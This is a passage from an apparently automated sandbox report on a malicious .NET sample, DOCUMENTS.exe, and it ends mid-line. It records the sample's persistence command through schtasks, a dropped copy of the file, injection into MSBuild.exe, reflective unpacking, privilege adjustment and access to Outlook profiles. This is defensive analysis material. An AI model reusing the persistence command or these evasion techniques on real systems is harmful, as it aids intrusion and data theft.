                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ncXzBAPDBtn' /XML 'C:\Users\user\AppData\Local\Temp\tmp9BE9.tmp'
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_058A0BF6 AdjustTokenPrivileges,
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_058A0BBF AdjustTokenPrivileges,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_0122AF3E AdjustTokenPrivileges,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_0122AF07 AdjustTokenPrivileges,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile created: C:\Users\user\AppData\Roaming\ncXzBAPDBtn.exeJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9BE9.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@6/6@0/1
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeMutant created: \Sessions\1\BaseNamedObjects\RAjRPPJiBWcsEVV
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2028:120:WilError_01
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: DOCUMENTS.exe, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: ncXzBAPDBtn.exe.0.dr, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.0.DOCUMENTS.exe.e30000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.DOCUMENTS.exe.e30000.0.unpack, Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                      Source: DOCUMENTS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: DOCUMENTS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: DOCUMENTS.exe, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: ncXzBAPDBtn.exe.0.dr, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.DOCUMENTS.exe.e30000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.DOCUMENTS.exe.e30000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_00E3297F push 20000001h; retf
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_016E30E9 pushfd ; ret
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_016E2EE5 push es; ret
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_016E2D42 push cs; ret
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019ECD6C push ebx; iretd
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeCode function: 0_2_019EA2D3 push ecx; retf
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 9_2_01222948 push cs; ret
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.54267894462
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.54267894462
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeFile created: C:\Users\user\AppData\Roaming\ncXzBAPDBtn.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ncXzBAPDBtn' /XML 'C:\Users\user\AppData\Local\Temp\tmp9BE9.tmp'
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe